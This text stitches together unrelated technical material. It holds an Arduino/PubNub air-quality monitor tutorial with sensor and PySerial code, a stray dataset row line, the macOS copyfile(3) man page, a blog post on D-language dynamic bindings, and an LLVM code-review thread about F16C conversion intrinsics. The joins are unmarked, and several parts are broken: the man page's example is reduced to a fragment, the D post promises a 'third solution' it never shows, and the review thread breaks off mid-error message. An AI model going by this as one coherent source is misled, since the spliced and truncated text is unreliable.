Inside the loop is where we will write the code to communicate with the sensor’s data. For each sensor, we essentially use the methods defined in their libraries to extract the data from the sensor and format the raw voltage reading to a recognizable unit of measure.
The code for each sensor is as follows:
//MQ7
analogRead(A1); // raw read (value unused; the library does the real conversion)
ppm = mq7.getPPM();
//Serial.print(" MQ7 = ");
//Serial.println(ppm,1);
//-----------------------------------
//MQ135
M135 = gasSensor.getPPM();
//Serial.print(" MQ135 = ");
//Serial.println(M135,1);
//-----------------------------------
//MQ2
float lpg = mq2.readLPG();
float smoke = mq2.readSmoke();
//Serial.print(" lpg = ");
//Serial.print(lpg,1);
//Serial.print(" Smoke = ");
//Serial.println(smoke,1);
//-----------------------------------
//DHT11
chk = DHT.read11(DHT11_PIN);
if(DHT.temperature > -500) //don't read any absurd readings
{
  //Serial.print("Temperature = ");
  Serial.println(DHT.temperature);
}
if(DHT.humidity > -500) //don't read any absurd readings
{
  //Serial.print("Humidity = ");
  Serial.println(DHT.humidity);
}
Note: We are going to comment out the serial.print lines except for the temperature and humidity. This makes future steps simpler. But if you’d like to test your devices, uncomment them. You can view the serial prints in the Arduino serial monitor. Just make sure that each sensor is publishing to a new line each time.
Lastly, we are going to program in our speaker. As discussed before, we must program the speaker to operate at a certain frequency to play a specific tone. We can easily do this by coding a pitches.h file.
Create a new file named pitches.h and paste the contents of this file in. At the top of your file, include the pitches.h file:
#include "pitches.h"
Next, copy and paste these methods that are responsible for playing a little jingle using the tone reference we created in the pitches.h file.
int melody[] = {NOTE_C4, NOTE_G3, NOTE_G3, NOTE_A3, NOTE_G3, 0, NOTE_B3, NOTE_C4};

// note durations: 4 = quarter note, 8 = eighth note, etc.:
int noteDurations[] = {4, 8, 8, 4, 4, 4, 4, 4};

void playTones()
{
  // iterate over the notes of the melody (speaker assumed on pin 8 --
  // adjust the pin to match your wiring):
  for (int thisNote = 0; thisNote < 8; thisNote++)
  {
    // to calculate the note duration, take one second divided by the note type
    // e.g. quarter note = 1000 / 4, eighth note = 1000 / 8, etc.
    int noteDuration = 1000 / noteDurations[thisNote];
    tone(8, melody[thisNote], noteDuration);

    // to distinguish the notes, set a minimum time between them;
    // the note's duration + 30% seems to work well:
    delay(noteDuration * 1.30);

    // stop the tone playing:
    noTone(8);
  }
}
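For reference, the NOTE_* constants in pitches.h are just equal-temperament frequencies. They can be derived from A4 = 440 Hz (a sketch; the real header is a precomputed table):

```c
#include <assert.h>

/* Equal-temperament frequency of a note n semitones away from A4 (440 Hz).
 * Each semitone multiplies the frequency by the twelfth root of two. */
static double note_freq(int semitones_from_a4)
{
    double f = 440.0;
    double ratio = 1.0594630943592953; /* 2^(1/12) */
    for (int i = 0; i < semitones_from_a4; i++)
        f *= ratio;
    for (int i = 0; i > semitones_from_a4; i--)
        f /= ratio;
    return f;
}
```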
Now we can have the jingle trigger if any of our sensor values reach above a certain threshold. You will need to create your own critical variables through trial and error as each sensor (at this price range) will come with a noticeable margin of error.
if((lpg > lpg_crit) || (smoke > smoke_crit) || (ppm > ppm_crit) ||
   (DHT.temperature > temp_crit) || (DHT.humidity > hum_crit) || (M135 > M135_crit))
{
  playTones();
}
After you’re done writing the Arduino code, select your Arduino’s USB port, hit the green checkmark to compile, and the green right arrow to upload it to your connected Arduino.
Tip: You can find the name of the port your Arduino is connected to by going into the top menu: Tools->Port
The finished product should look like this:
Publishing Code
Now at this point, you may be wondering, why do we need separate code just to publish messages from our Arduino? Can’t we just do it straight from the sketch?
To simplify a complicated answer, the PubNub Arduino SDK requires the use of a WIFI shield to enable Internet capabilities. Since that is out of the scope of this project, we will revert to an alternative method: PySerial.
PySerial is a library that listens in on the Arduino's serial port. Anything printed over the serial connection can be read by PySerial. Thus, we can extract the data from the serial bus and publish that data through PubNub.
To install Pyserial, type this command into your terminal:
pip install pyserial
Then create a python script and include these libraries (assuming you already created a PubNub account).
import serial
from pubnub.callbacks import SubscribeCallback
from pubnub.enums import PNStatusCategory
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
from time import sleep

pnconfig = PNConfiguration()
# Then set up your PySerial port connection with the following line:
Arduino_Serial = serial.Serial('YOUR PORT NAME', 9600, timeout=1)

# Now create a PubNub instance
pnconfig.subscribe_key = "YOUR SUBSCRIBE KEY"
pnconfig.publish_key = "YOUR PUBLISH KEY"
pnconfig.ssl = False
pubnub = PubNub(pnconfig)

# Create a publishing callback
def publish_callback(envelope, status):
    pass
Next, create the infinite loop of your program that continuously extracts and publishes data. We must be careful now as PySerial's serial bus monitor is very blind and can only see data coming in serially. It cannot distinguish names or variables, only numbers separated by the newline character ('\n').
Since we are only going to work with two different sensor readings (temperature and humidity), we can expect the first line of data to come from sensor A, the second from sensor B, the third from sensor A, the fourth from sensor B, and so on.
Going back to the Arduino sketch covered earlier, our temperature sensor is printing first in the code, so we can expect that the pattern will go temperature, then humidity, then repeat. Thus we should capture the data like so, using the correct syntax from Pyserial.
# read in data from the serial bus, 5 (depends on the length of the target data)
# characters at a time
# NOTE: you must decode the data as serial code is different from human code!
temp = str(Arduino_Serial.readline().decode('ascii'))
hum = str(Arduino_Serial.readline().decode('ascii'))
Next, we should print the values to the terminal before publishing using PubNub in order to see if we’re getting legit data:
print(temp + '\n')
print(hum + '\n')
If everything is running smoothly, your terminal should look like this:
Notice the alternation of data – 29 corresponds to temperature and 34 corresponds to humidity.
Now we’re going to publish this data to our real-time data visualization framework: PubNub EON. In order to send the data that EON can parse and graph, we must format the data first into a JSON format like so:
dictionary = {"eon": {"temp": temp, "hum": hum }}
Then we can publish to the same channel that the chart will later be subscribed to and we’ll be good to go!
pubnub.publish().channel("eon-chart").message(dictionary).pn_async(publish_callback)
HTML Graphical Representation Code
Now it’s time to use PubNub EON to display the readings in real time on a live chart.
To add PubNub EON to any HTML page, simply add this div tag in your body, which will inject the actual chart:
<div id="chart"></div>
Then import the script tag SDK:
<script src=""></script> <link rel="stylesheet" href=""/>
Then subscribe to the eon-chart channel that you will be posting data to:
eon.chart({
  channels: ['eon-chart'],
  history: true,
  flow: true,
  pubnub: pubnub,
  generate: {
    bindto: '#chart',
    data: {
      labels: false
    }
  }
});
And that’s it! You’ve now got a connected device collecting and streaming air quality readings in real time, and publishing them to a live dashboard, complete with threshold alerts! Your final result should look something like this:
Nice work! Want to explore other IoT use cases? Check out the tutorials below: | https://www.pubnub.com/blog/diy-air-quality-monitoring-system-with-realtime-readings-and-live-alerts/ | CC-MAIN-2021-17 | refinedweb | 2,071 | 55.03 |
Static bindings can be linked with static libraries at compile time; they can also be linked with dynamic libraries at compile time. In the C or C++ world, this is quite common when using shared libraries. On Windows, it is done via an import library. Given an application "Foo" that makes use of the DLL "Bar", when "Foo" is compiled it will be linked with an import library named Bar.lib. This will cause the DLL to be loaded automatically by the operating system when the application is executed. The same thing can be accomplished on Posix systems by linking directly with the shared object file (extending the example, that would be libBar.so in this case). So with a static binding in D, a program can be linked at compile time with the static library Bar.lib (Windows) or libBar.a (Posix) for static linkage, or the import library Bar.lib (Windows) or libBar.so (Posix) for dynamic linkage.
A dynamic binding cannot be linked to anything at compile time. No static libraries, no import libraries, no shared objects. It is designed explicitly for loading a shared library manually at run time. In the C and C++ world, this technique is often used to implement plugin systems, or to implement hot swapping of different application subsystems (for example, switching between different renderers). In D, a function does not need to be declared before it can be called. As long as it is in the currently visible namespace, it's callable. However, when linking with a C library, we don't have access to any function implementations (nor, actually, to the declarations--hence the binding). They are external to the application. In order to call into that library, the D compiler needs to be made aware of the existence of the functions that need to be called so that, at link time, it can match up the proper address offsets to make the call. This is the only case I can think of in D where a function declaration isn't just useful, but required.
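For comparison, here is what that manual run-time loading technique looks like in plain C on a Posix system, using dlopen and dlsym (a sketch; libm and its cos function stand in for the hypothetical "Bar" library):

```c
#include <assert.h>
#include <dlfcn.h>

/* Manually load a shared library at run time and fetch one symbol --
 * the same thing a dynamic binding's loader does internally. */
static double call_cos_dynamically(double x)
{
    void *lib = dlopen("libm.so.6", RTLD_NOW);
    if (!lib)
        return -999.0; /* sentinel: library not found */

    /* dlsym returns a void*, which must be converted to the right
     * function pointer type before it can be called. */
    double (*cos_ptr)(double) = (double (*)(double))dlsym(lib, "cos");
    if (!cos_ptr) {
        dlclose(lib);
        return -999.0;
    }

    double result = cos_ptr(x);
    dlclose(lib);
    return result;
}
```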
I explained linkage attributes in an earlier post in this series.
int foo(int i) { return i; }

void main()
{
    int function(int) fooPtr;
    fooPtr = &foo;

    alias int function(int) da_fooPtr;
    da_fooPtr fooPtr2 = &foo;

    import std.stdio;
    writeln(fooPtr(1));
    writeln(fooPtr2(2));
}

So what is the difference between the direct declaration and the aliased version? There is none! At least, not on the surface. I'll get into that later. Let's look at another example. Translating a C callback into D.
// In C, foo.h
typedef int (*MyCallback)(void);

// In D
extern( C ) alias int function() MyCallback;

Notice that I used the alias form here. Anytime you declare a typedefed C function pointer in D, it should be aliased so that it can be used the same way. Finally, the case of function pointers declared inline in a parameter list.
// In C, foo.h
extern void foo(int (*BarPtr)(int));

// In D.
// Option 1
extern( C ) void foo(int function(int) BarPtr);

// Option 2
extern( C ) alias int function(int) BarPtr;
extern( C ) void foo(BarPtr);

Personally, I prefer option 2. Next up is function pointer initialization.
In one of the examples above (fooPtr), I showed how a function pointer can be declared and initialized. But in that example, it is obvious to the compiler that the function foo and the pointer fooPtr have the same basic signature (return type and parameter list). Now consider this example.
// This is all D.
int foo() { return 1; }

void* getPtr() { return cast(void*)&foo; }

void main()
{
    int function() fooPtr;
    fooPtr = getPtr();
}

This will not compile, because D does not implicitly convert a void* to a function pointer; the return value of getPtr() has to be cast first, for example: fooPtr = cast(int function())getPtr();
I implied above that there was more than one possible solution. Here's the second one.
int foo() { return 1; }

void* getPtr() { return cast(void*)&foo; }

void bindFunc(void** func) { *func = getPtr(); }

void main()
{
    int function() fooPtr;
    bindFunc(cast(void**)&fooPtr);
}

Here, the address of fooPtr is being taken (giving us, essentially, a foo**) and cast to void**. Then bindFunc is able to dereference the pointer and assign it the void* value without a cast. When I first implemented Derelict, I used the alias approach. In Derelict 2, Tomasz Stachowiak implemented a new loader using the void** technique. That worked well. And, as a bonus, it eliminated a great many alias declarations from the codebase. Until something happened that, while a good thing for many users of D on Linux, turned out to be a big headache for me.
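For readers more comfortable in C, the same void** trick can be sketched there as well. The getPtr and bindFunc names below mirror the D example and are stand-ins for a real symbol lookup such as dlsym or GetProcAddress; note that converting a function pointer through void* is technically implementation-defined in standard C, though Posix loaders depend on it working:

```c
#include <assert.h>

static int the_answer(void) { return 42; }

/* Stand-in for dlsym/GetProcAddress: returns a symbol as a generic pointer. */
static void *get_ptr(void)
{
    return (void *)the_answer;
}

/* The void** trick: the loader writes through a pointer-to-pointer, so the
 * call site needs no per-function cast of the returned value. */
static void bind_func(void **func)
{
    *func = get_ptr();
}
```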
For several years, DMD did not provide a stack trace when exceptions were thrown. Then, some time ago, a release was made that implemented stack traces on Linux. The downside was that it was done in a way that broke Derelict 2 completely on that platform. To make a long story short, the DMD configuration files were preconfigured to export all symbols when compiling any binaries, be they shared objects or executables. Without this, the stack trace implementation wouldn't work. This caused every function pointer in Derelict to clash with every function exported by the bound libraries. In other words. the function pointer glClear in Derelict 2 suddenly started to conflict with the actual glClear function in the shared library, even though the library was loaded manually (which, given my Windows background, makes absolutely no sense to me whatsoever). So, I had to go back to the aliased function pointers. Aliased function pointers and variables declared of their type aren't exported. If you are going to make a publicly available dynamic binding, this is something you definitely need to keep in mind.
I still use the void** style to load function pointers, despite having switched back to aliases. It was less work than converting everything to a direct load. And when I implemented Derelict 3, I kept it that way. So if you look at the Derelict loaders...
// Instead of seeing this
foo = cast(da_Foo)getSymbol("foo");

// You'll see this
foo = bindFunc(cast(void**)&foo, "foo");

I don't particularly advocate one over the other when implementing a binding with the aid of a script. But if you're doing it by hand, the latter is much more amenable to quick copy-pasting.
There's one more important issue to discuss. Given that a dynamic binding uses function pointers, the pointers are subject to D's rules for variable storage. And by default, all variables in D are stashed in Thread-Local Storage. What that means is that, by default, each thread gets its own copy of the variable. So if a binding just blindly declares function pointers, then they are loaded in one thread and called in another... boom! Thankfully, D's function pointers are default initialized to null, so all you get is an access violation and not a call into random memory somewhere. The solution here is to let D know that the function pointers need to be shared across all threads. We can do that using one of two keywords: shared or __gshared.
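The thread-local-by-default behavior described here is easy to demonstrate in C, where _Thread_local plays the role of D's default storage class. A sketch using POSIX threads:

```c
#include <assert.h>
#include <pthread.h>

/* Each thread gets its own copy of a _Thread_local variable -- the C
 * analogue of D's default storage for module-level variables. */
static _Thread_local int tls_value = 0;
static int seen_in_other_thread = -1;

static void *worker(void *arg)
{
    (void)arg;
    /* This thread's copy was never assigned, so it still holds 0. */
    seen_in_other_thread = tls_value;
    return 0;
}

static int run_tls_demo(void)
{
    tls_value = 99; /* only modifies the main thread's copy */
    pthread_t t;
    if (pthread_create(&t, 0, worker, 0) != 0)
        return -1;
    pthread_join(t, 0);
    return seen_in_other_thread; /* 0: the write was not visible */
}
```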
One of the goals of D is to make concurrency easier than it traditionally has been in C-like languages. The shared type qualifier is intended to work toward that goal. When using it, you are telling the compiler that a particular variable is intended to be used across threads. The compiler can then complain if you try to access it in a way that isn't thread-safe. But like D's immutable and const, shared is transitive. That means if you follow any references from a shared object, they must also be shared. There are a number of issues that have yet to be worked out, so it hasn't seen a lot of practical usage that I'm aware of. And that's where __gshared comes in.
When you tell the compiler that a piece of data is __gshared, you are saying, "Hey, Mr. Compiler, I want to share this data across threads, but I don't want you to pay any attention to how I use it, mmkay?" Essentially, it's no different from a normal variable in C or C++. If you want to share a __gshared variable across threads, it's your responsibility to make sure it's properly synchronized. The compiler isn't going to help you.
So when implementing a dynamic binding, a decision has to be made: thread-local (default), shared, or __gshared. My answer is __gshared. If we pretend that our function pointers are actual functions, which are accessible across threads anyway, then there isn't too much to worry about. Care still need be taken to ensure that the functions are loaded before any other threads try to access them and that no threads try to access them after the bound library is unloaded. In Derelict, I do this with static module constructors and destructors (which can still lead to some issues during program shutdown, but I'll cover that in a separate post). Here's an example.
extern( C )
{
    alias void function(int) da_foo;
    alias int function() da_bar;
}

__gshared
{
    da_foo foo;
    da_bar bar;
}

Finally, there's the question of how to load the library. That, I'm afraid, is an exercise for the reader. In Derelict, I implemented a utility package (DerelictUtil) that abstracts the platform APIs for loading shared libraries and fetching their symbols. The abstraction is behind a set of free functions that can be used directly or via a convenient object interface. In Derelict itself, I use the latter since it makes managing loading an entire library easier. But in external projects, I often use the free-function interface for loading one or two functions at a time (such as certain Win32 functions that aren't available in the ancient libs shipped with DMD). It also supports selective loading, which is a term I use for being able to load a library if specific functions are missing (the default behavior is to throw an exception when an expected symbol fails to load).
Conclusion
Overall, there's a good deal of work involved in implementing any sort of binding in D. But I think it's obvious that dynamic bindings require quite some extra effort. This is especially true given that the automated tools I've seen so far are all geared toward generating static bindings. I've only recently begun to use custom scripts myself, but they still require a bit of manual preparation because I don't want to deal with a full-on C parser. That said, I prefer dynamic bindings myself. I like having the ability to load and unload at will and to have the opportunity to present my own error message to the user when a library is missing. Others disagree with me and prefer to use static bindings. That's perfectly fine.
At this point, static and dynamic bindings exist for several popular libraries already. Deimos is a collection of the former and Derelict 3 the latter.
Here's a third solution:
and in bindFunc, "ref void* func" could be used instead of void**, that's a little nicer imho.
What would be really cool is if someone could come up with a compile-time only system which allows to write one binding and compile it to dynamic/static binding depending on a version statement: | http://www.gamedev.net/blog/1140/entry-2255632-binding-d-to-c-part-five/ | CC-MAIN-2014-35 | refinedweb | 1,838 | 64.1 |
copyfile(3) BSD Library Functions Manual copyfile(3)
NAME
copyfile, fcopyfile, copyfile_state_alloc, copyfile_state_free, copyfile_state_get, copyfile_state_set -- copy a file
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <copyfile.h>

int
copyfile(const char *from, const char *to, copyfile_state_t state,
    copyfile_flags_t flags);

int
fcopyfile(int from, int to, copyfile_state_t state,
    copyfile_flags_t flags);

copyfile_state_t
copyfile_state_alloc(void);

int
copyfile_state_free(copyfile_state_t state);

int
copyfile_state_get(copyfile_state_t state, uint32_t flag, void * dst);

int
copyfile_state_set(copyfile_state_t state, uint32_t flag, const void * src);

typedef int (*copyfile_callback_t)(int what, int stage, copyfile_state_t state,
    const char * src, const char * dst, void * ctx);
DESCRIPTION
These functions are used to copy a file's data and/or metadata. (Metadata consists of permissions, extended attributes, access control lists, and so forth.)

The copyfile_state_alloc() function initializes a copyfile_state_t object (which is an opaque data type). This object can be passed to copyfile() and fcopyfile(); copyfile_state_get() and copyfile_state_set() can be used to manipulate the state (see below). The copyfile_state_free() function is used to deallocate the object and its contents.

The copyfile() function can copy the named from file to the named to file; the fcopyfile() function does the same, but using the file descriptors of already-opened files.

If the state parameter is the return value from copyfile_state_alloc(), then copyfile() and fcopyfile() will use the information from the state object; if it is NULL, then both functions will work normally, but less control will be available to the caller.

The flags parameter controls which contents are copied:

COPYFILE_ACL    Copy the source file's access control lists.

COPYFILE_STAT   Copy the source file's POSIX information (mode, modification time, etc.).

COPYFILE_XATTR  Copy the source file's extended attributes.

COPYFILE_DATA   Copy the source file's data.

These values may be or'd together; several convenience macros are provided:

COPYFILE_SECURITY  Copy the source file's POSIX and ACL information; equivalent to (COPYFILE_STAT|COPYFILE_ACL).

COPYFILE_METADATA  Copy the metadata; equivalent to (COPYFILE_SECURITY|COPYFILE_XATTR).

COPYFILE_ALL       Copy the entire file; equivalent to (COPYFILE_METADATA|COPYFILE_DATA).

The copyfile() and fcopyfile() functions can also have their behavior modified by the following flags:

COPYFILE_RECURSIVE  Causes copyfile() to recursively copy a hierarchy. This flag is not used by fcopyfile(); see below for more information.

COPYFILE_CHECK      Return a bitmask (corresponding to the flags argument) indicating which contents would be copied; no data are actually copied.
(E.g., if flags was set to COPYFILE_CHECK|COPYFILE_METADATA, and the from file had extended attributes but no ACLs, the return value would be COPYFILE_XATTR.)

COPYFILE_PACK          Serialize the from file. The to file is an AppleDouble-format file.

COPYFILE_UNPACK        Unserialize the from file. The from file is an AppleDouble-format file; the to file will have the extended attributes, ACLs, resource fork, and FinderInfo data from the to file, regardless of the flags argument passed in.

COPYFILE_EXCL          Fail if the to file already exists. (This is only applicable for the copyfile() function.)

COPYFILE_NOFOLLOW_SRC  Do not follow the from file, if it is a symbolic link. (This is only applicable for the copyfile() function.)

COPYFILE_NOFOLLOW_DST  Do not follow the to file, if it is a symbolic link. (This is only applicable for the copyfile() function.)

COPYFILE_MOVE          Unlink (using remove(3)) the from file. (This is only applicable for the copyfile() function.) No error is returned if remove(3) fails. Note that remove(3) removes a symbolic link itself, not the target of the link.

COPYFILE_UNLINK        Unlink the to file before starting. (This is only applicable for the copyfile() function.)

COPYFILE_NOFOLLOW      This is a convenience macro, equivalent to (COPYFILE_NOFOLLOW_DST|COPYFILE_NOFOLLOW_SRC).

The copyfile_state_get() and copyfile_state_set() functions can be used to manipulate the copyfile_state_t object returned by copyfile_state_alloc(). In both functions, the dst parameter's type depends on the flag parameter that is passed in.

COPYFILE_STATE_SRC_FD
COPYFILE_STATE_DST_FD  Get or set the file descriptor associated with the source (or destination) file. If this has not been initialized yet, the value will be -2. The dst (for copyfile_state_get()) and src (for copyfile_state_set()) parameters are pointers to int.

COPYFILE_STATE_SRC_FILENAME
COPYFILE_STATE_DST_FILENAME
                       Get or set the filename associated with the source (or destination) file.
If it has not been initialized yet, the value will be NULL. For copyfile_state_set(), the src parameter is a pointer to a C string (i.e., char*); copyfile_state_set() makes a private copy of this string. For copyfile_state_get(), the dst parameter is a pointer to a pointer to a C string (i.e., char**); the returned value is a pointer to the state's copy, and must not be modified or released.

COPYFILE_STATE_STATUS_CB   Get or set the callback status function (currently only used for recursive copies; see below for details). The src parameter is a pointer to a function of type copyfile_callback_t (see above).

COPYFILE_STATE_STATUS_CTX  Get or set the context parameter for the status call-back function (see below for details). The src parameter is a void *.

COPYFILE_STATE_QUARANTINE  Get or set the quarantine information with the source file. The src parameter is a pointer to an opaque object (type void *).

COPYFILE_STATE_COPIED      Get the number of data bytes copied so far. (Only valid for copyfile_state_get(); see below for more details about callbacks.) The dst parameter is a pointer to off_t (type off_t *).

COPYFILE_STATE_XATTRNAME   Get the name of the extended attribute during a callback for COPYFILE_COPY_XATTR (see below for details). This field cannot be set, and may be NULL.
Recursive Copies
When given the COPYFILE_RECURSIVE flag, copyfile() (but not fcopyfile()) will use the fts(3) functions to recursively descend into the source file-system object. It then calls copyfile() on each of the entries it finds that way. If a call-back function is given (using copyfile_state_set() and COPYFILE_STATE_STATUS_CB), the call-back function will be called four times for each directory object, and twice for all other objects. (Each directory will be examined twice, once on entry, and once on exit.)

The call-back function will have one of the following values as the first argument, indicating what is being copied:

COPYFILE_RECURSE_FILE         The object being copied is a file (or, rather, something other than a directory).

COPYFILE_RECURSE_DIR          The object being copied is a directory, and is being entered. (That is, none of the filesystem objects contained within the directory have been copied yet.)

COPYFILE_RECURSE_DIR_CLEANUP  The object being copied is a directory, and all of the objects contained have been copied. At this stage, the destination directory being copied will have any extra permissions that were added to allow the copying removed.

COPYFILE_RECURSE_ERROR        There was an error in processing an element of the source hierarchy; this happens when fts(3) returns an error or unknown file type. (Currently, the second argument to the call-back function will always be COPYFILE_ERR in this case.)

The second argument to the call-back function will indicate the stage of the copy, and will be one of the following values:

COPYFILE_START   Before copying has begun. The third parameter will be a newly-created copyfile_state_t object with the call-back function and context pre-loaded.

COPYFILE_FINISH  After copying has successfully finished.

COPYFILE_ERR     Indicates an error has happened at some stage. If the first argument to the call-back function is COPYFILE_RECURSE_ERROR, then an error occurred while processing the source hierarchy; otherwise, it will indicate what type of object was being copied, and errno will be set to indicate the error.
The fourth and fifth parameters are the source and destination paths that are to be copied (or have been copied, or failed to copy, depending on the second argument). The last argument to the call-back function will be the value set by COPYFILE_STATE_STATUS_CTX, if any.

The call-back function is required to return one of the following values:

COPYFILE_CONTINUE  The copy will continue as expected.

COPYFILE_SKIP      This object will be skipped, and the next object will be processed. (Note that, when entering a directory, returning COPYFILE_SKIP from the call-back function will prevent the contents of the directory from being copied.)

COPYFILE_QUIT      The entire copy is aborted at this stage. Any filesystem objects created up to this point will remain. copyfile() will return -1, but errno will be unmodified.

The call-back function must always return one of the values listed above; if not, the results are undefined.

The call-back function will be called twice for each object (and an additional two times for directory cleanup); the first call will have a stage parameter of COPYFILE_START; the second time, that value will be either COPYFILE_FINISH or COPYFILE_ERR to indicate a successful completion, or an error during processing. In the event of an error, the errno value will be set appropriately.

The COPYFILE_PACK, COPYFILE_UNPACK, COPYFILE_MOVE, and COPYFILE_UNLINK flags are not used during a recursive copy, and will result in an error being returned.
Progress Callback
In addition to the recursive callbacks described above, copyfile() and fcopyfile() will also use a callback to report data (e.g., COPYFILE_DATA) progress. If given, the callback will be invoked on each write(2) call. The first argument to the callback function will be COPYFILE_COPY_DATA. The second argument will either be COPYFILE_PROGRESS (indicating that the write was successful), or COPYFILE_ERR (indicating that there was an error of some sort).

The amount of data bytes copied so far can be retrieved using copyfile_state_get(), with the COPYFILE_STATE_COPIED requestor (the argument type is a pointer to off_t).

When copying extended attributes, the first argument to the callback function will be COPYFILE_COPY_XATTR. The other arguments will be as described for COPYFILE_COPY_DATA; the name of the extended attribute being copied may be retrieved using copyfile_state_get() and the parameter COPYFILE_STATE_XATTRNAME. When using COPYFILE_PACK, the callback may be called with COPYFILE_START for each of the extended attributes first, followed by COPYFILE_PROGRESS before getting and packing the data for each individual attribute, and then COPYFILE_FINISH when finished with each individual attribute. (That is, COPYFILE_START may be called for all of the extended attributes, before the first callback with COPYFILE_PROGRESS is invoked.) Any attribute skipped by returning COPYFILE_SKIP from the COPYFILE_START callback will not be placed into the packed output file.

The return value for the data callback must be one of:

COPYFILE_CONTINUE  The copy will continue as expected. (In the case of error, it will attempt to write the data again.)

COPYFILE_SKIP      The data copy will be aborted, but without error.

COPYFILE_QUIT      The data copy will be aborted; in the case of COPYFILE_PROGRESS, errno will be set to ECANCELED.

While the src and dst parameters will be passed in, they may be NULL in the case of fcopyfile().
RETURN VALUES
Except when given the COPYFILE_CHECK flag, copyfile() and fcopyfile() return less than 0 on error, and 0 on success. All of the other func- tions return 0 on success, and less than 0 on error.
WARNING
Both copyfile() and fcopyfile() can copy symbolic links; there is a gap between when the source link is examined and the actual copy is started, and this can be a potential security risk, especially if the process has elevated privileges. When performing a recursive copy, if the source hierarchy changes while the copy is occurring, the results are undefined. fcopyfile() does not reset the seek position for either source or desti- nation. This can result in the destination file being a different size than the source file.
ERRORS
copyfile() and fcopyfile() will fail if: [EINVAL] An invalid flag was passed in with COPYFILE_RECURSIVE. [EINVAL] The from or to parameter to copyfile() was a NULL pointer. [EINVAL] The from or to parameter to copyfile() was a negative number. [ENOMEM] A memory allocation failed. [ENOTSUP] The source file was not a directory, symbolic link, or regular file. [ECANCELED] The copy was cancelled by callback. In addition, both functions may set errno via an underlying library or system call.
EXAMPLES
/*);
SEE ALSO
listxattr(2), getxattr(2), setxattr(2), acl(3)
BUGS
Both copyfile() functions lack a way to set the input or output block size. Recursive copies do not honor hard links.
HISTORY
The copyfile() API was introduced in Mac OS X 10.5. BSD April 27, 2006 BSD
Mac OS X 10.8 - Generated Mon Aug 27 16:33:41 CDT 2012 | http://www.manpagez.com/man/3/copyfile/ | CC-MAIN-2020-05 | refinedweb | 1,973 | 55.13 |
I have added 2 missing intrinsics _cvtss_sh and _mm_cvtps_ph to the intrinsics header f16intrin.h.
GCC has these intrinsics in f16cintrin.h. Here is the definition:
extern __inline float __attribute__((__gnu_inline__, __always_inline__, __artificial__))
_cvtsh_ss (unsigned short __S)
{
__v8hi __H = __extension__ (__v8hi){ __S, 0, 0, 0, 0, 0, 0, 0 };
__v4sf __A = __builtin_ia32_vcvtph2ps (__H);
return __builtin_ia32_vec_ext_v4sf (__A, 0);
`}
#ifdef __OPTIMIZE__
extern __inline unsigned short __attribute__((__gnu_inline__, __always_inline__, __artificial__))
_cvtss_sh (float __F, const int __I)
{
__v4sf __A = __extension__ (__v4sf){ __F, 0, 0, 0 };
__v8hi __H = __builtin_ia32_vcvtps2ph (__A, __I);
return (unsigned short) __builtin_ia32_vec_ext_v8hi (__H, 0);
`}
#else
#define _cvtss_sh(__F, __I) \
(__extension__ \
({ \
__v4sf __A = __extension__ (__v4sf){ __F, 0, 0, 0 }; \
__v8hi __H = __builtin_ia32_vcvtps2ph (__A, __I); \
(unsigned short) __builtin_ia32_vec_ext_v8hi (__H, 0); \
}))
#endif /* __OPTIMIZE */
Intel's documentation expects _cvtsh_ss to have 2 parameters (instead of one)
but most likely the documentation is wrong, because Intel’s' headers contain these intrinsic prototypes in emmintrin.h
extern float __ICL_INTRINCC _cvtsh_ss(unsigned short);
extern unsigned short __ICL_INTRINCC _cvtss_sh(float, int);
BTW, emmintrin.h includes f16cintrin.h, so it should be OK to place these 2 intrinsics in f16cintrin.h. This should satisfy both Intel's and GCC's expectations.
Clang generates the following IR for cvtsh_ss (see below). In the test I simply checked that the builtin @llvm.x86.vcvtph2ps.128 is generated for _cvtsh_ss. I was afraid that checks for initialization of the vector 'v' might be too lengthy and the IR is prone to change frequently, so I didn't add these checks. However, if you think that this is important and it won't create too much headache because IR will keep changing over time, I could certainly add them.
The same goes for test_cvtss_sh.
static __inline float __DEFAULT_FN_ATTRS
cvtsh_ss(unsigned short a)
{
__v8hi v = {(short)a, 0, 0, 0, 0, 0, 0, 0};
__v4sf r = __builtin_ia32_vcvtph2ps(v);
return r[0];
}
define float @test_cvtsh_ss(i16 zeroext %a) #0 {
entry:
%a.addr.i = alloca i16, align 2
%v.i = alloca <8 x i16>, align 16
%r.i = alloca <4 x float>, align 16
%a.addr = alloca i16, align 2
store i16 %a, i16* %a.addr, align 2
%0 = load i16, i16* %a.addr, align 2
store i16 %0, i16* %a.addr.i, align 2
%1 = load i16, i16* %a.addr.i, align 2
%vecinit.i = insertelement <8 x i16> undef, i16 %1, i32 0
%vecinit1.i = insertelement <8 x i16> %vecinit.i, i16 0, i32 1
%vecinit2.i = insertelement <8 x i16> %vecinit1.i, i16 0, i32 2
%vecinit3.i = insertelement <8 x i16> %vecinit2.i, i16 0, i32 3
%vecinit4.i = insertelement <8 x i16> %vecinit3.i, i16 0, i32 4
%vecinit5.i = insertelement <8 x i16> %vecinit4.i, i16 0, i32 5
%vecinit6.i = insertelement <8 x i16> %vecinit5.i, i16 0, i32 6
%vecinit7.i = insertelement <8 x i16> %vecinit6.i, i16 0, i32 7
store <8 x i16> %vecinit7.i, <8 x i16>* %v.i, align 16
%2 = load <8 x i16>, <8 x i16>* %v.i, align 16
%3 = call <4 x float> @llvm.x86.vcvtph2ps.128(<8 x i16> %2) #2
store <4 x float> %3, <4 x float>* %r.i, align 16
%4 = load <4 x float>, <4 x float>* %r.i, align 16
%vecext.i = extractelement <4 x float> %4, i32 0
ret float %vecext.i
}
Adding cfe-commits as a subscriber.
Would it be possible to do this without temporaries? Temporaries in macros can cause -Wshadow warnings if the macro is used multiple times.
Craig, thank you for the review. Here are the changes that you requested.
Katya.
Can we do something like this to remove the last temporary?
#define _cvtss_sh(a, imm) extension ({ \
(unsigned short)((__v8hi)__builtin_ia32_vcvtps2ph((__v4sf){a, 0, 0, 0}, (imm))[0]); \
})
Updated patch to address Craig's comments.
Hi Craig,
I should have looked how it's done just a few lines below. Sorry.
I had to slightly modify the body of the define that you proposed by adding an additional pair of round brackets, otherwise I got compilation errors like this:
~/ngh/ToT_commit/build/bin/clang intr.cpp -mf16c intr.cpp:10:7:
error: C-style cast from scalar 'short' to vector '__v8hi'
(vector of 8 'short' values) of different size
a = _cvtss_sh(res, imm);
^~~~~~~~~~~~~~~~~~~
~/ngh/ToT_commit/build/bin/../lib/clang/3.8.0/include/f16cintrin.h:43:20: note:
